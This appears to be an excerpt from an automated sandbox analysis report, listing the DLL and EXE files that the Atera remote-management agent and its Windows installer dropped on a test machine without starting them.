                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56F2.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICA80.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA8AC.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAC76.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 692c4a.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.UserSecrets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2D79.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2FBD.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 692c4b.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Diagnostics.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5885.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dllJump to dropped file
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.FileExtensions.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.TypeConverter.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.WinForm.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI2FBD.tmp-\Newtonsoft.Json.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.Utils.dll
